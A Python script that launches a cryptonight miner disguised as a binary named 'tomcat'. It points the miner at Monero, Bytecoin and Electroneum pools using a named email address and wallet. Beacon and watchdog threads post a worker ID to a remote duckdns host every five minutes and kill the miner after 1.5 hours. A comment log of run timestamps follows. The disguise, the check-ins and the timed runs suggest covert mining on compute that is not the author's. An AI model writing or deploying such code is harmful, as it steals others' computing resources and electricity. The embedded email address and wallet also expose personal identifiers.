import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:07.343641
#2018-02-17 16:34:05.294194
#2018-02-17 18:22:07.325759
#2018-02-17 20:10:04.359318
#2018-02-17 21:57:02.214512
#2018-02-17 23:42:01.463811
#2018-02-18 01:32:05.171669
#2018-02-18 03:18:05.216798
#2018-02-18 05:07:05.819382
#2018-02-18 07:00:04.562875
#2018-02-18 08:49:04.675656
#2018-02-18 10:36:04.108068
#2018-02-18 12:21:01.246952
#2018-02-18 14:08:01.728309
#2018-02-18 15:58:04.941218
#2018-02-18 17:47:07.135174
#2018-02-18 19:33:07.823001
#2018-02-18 21:18:07.156846
#2018-02-18 23:06:01.942764
#2018-02-19 00:53:03.727569
#2018-02-19 02:40:07.424135
#2018-02-19 04:27:04.287377
#2018-02-19 06:12:06.913277
#2018-02-19 07:59:04.694542
#2018-02-19 09:50:01.361261
#2018-02-19 11:39:04.528531
#2018-02-19 13:26:04.817154
#2018-02-19 15:14:08.425952
#2018-02-19 17:03:01.798424
#2018-02-19 18:48:06.414445
#2018-02-19 20:36:01.970715
#2018-02-19 22:22:01.396357
#2018-02-20 00:07:06.379382
#2018-02-20 01:53:06.357595
#2018-02-20 03:42:05.421431
#2018-02-20 05:29:03.930335
#2018-02-20 07:13:01.588020
#2018-02-20 08:58:05.536991
#2018-02-20 10:42:01.586589
#2018-02-20 12:28:08.354255
#2018-02-20 14:16:08.331908
#2018-02-20 16:01:06.882949
#2018-02-20 17:48:09.814292
#2018-02-20 19:40:04.700092
#2018-02-20 21:26:01.827784
#2018-02-20 23:11:08.104011
#2018-02-21 00:57:06.729192
#2018-02-21 02:45:09.789565
#2018-02-21 04:31:05.406267
#2018-02-21 06:18:06.976505
#2018-02-21 08:04:05.086606
#2018-02-21 09:50:08.499010
#2018-02-21 11:38:05.147974
#2018-02-21 13:28:07.894988
#2018-02-21 15:13:07.076689
#2018-02-21 17:03:12.962436
#2018-02-21 18:50:05.625241
#2018-02-21 20:37:07.159933
#2018-02-21 22:23:06.021030
#2018-02-22 00:13:05.028270
#2018-02-22 02:01:04.464491
#2018-02-22 03:47:06.266130
#2018-02-22 05:34:05.731454
#2018-02-22 07:19:02.094870
#2018-02-22 09:06:02.098719
#2018-02-22 10:53:08.379064
#2018-02-22 12:40:03.776669
#2018-02-22 14:26:04.311163
#2018-02-22 16:13:09.490789
#2018-02-22 17:58:06.529262
#2018-02-22 19:47:01.667677
#2018-02-22 21:37:02.145991
#2018-02-22 23:25:10.447768
#2018-02-23 01:12:06.659346
#2018-02-23 02:58:05.079764
#2018-02-23 04:44:04.489582
#2018-02-23 06:33:07.094655
#2018-02-23 08:22:06.752958
#2018-02-23 10:38:02.148202
#2018-02-23 12:32:05.564193
#2018-02-23 14:19:05.377825
#2018-02-23 16:11:08.965011
#2018-02-23 17:58:01.795873
#2018-02-23 19:44:01.256488
#2018-02-23 21:26:08.799140
#2018-02-23 23:16:05.922308
#2018-02-24 01:02:04.643906
#2018-02-24 02:54:01.374975
#2018-02-24 04:42:05.160155
#2018-02-24 06:26:05.896924
#2018-02-24 08:14:06.934557
#2018-02-24 09:59:07.373839
#2018-02-24 11:58:03.221966
#2018-02-24 13:45:09.076807
#2018-02-24 15:34:03.518612
#2018-02-24 17:29:04.928590
#2018-02-24 19:16:07.092993
#2018-02-24 21:04:01.282264
#2018-02-24 23:37:06.726970
#2018-02-25 03:43:06.643795
#2018-02-25 07:29:01.557223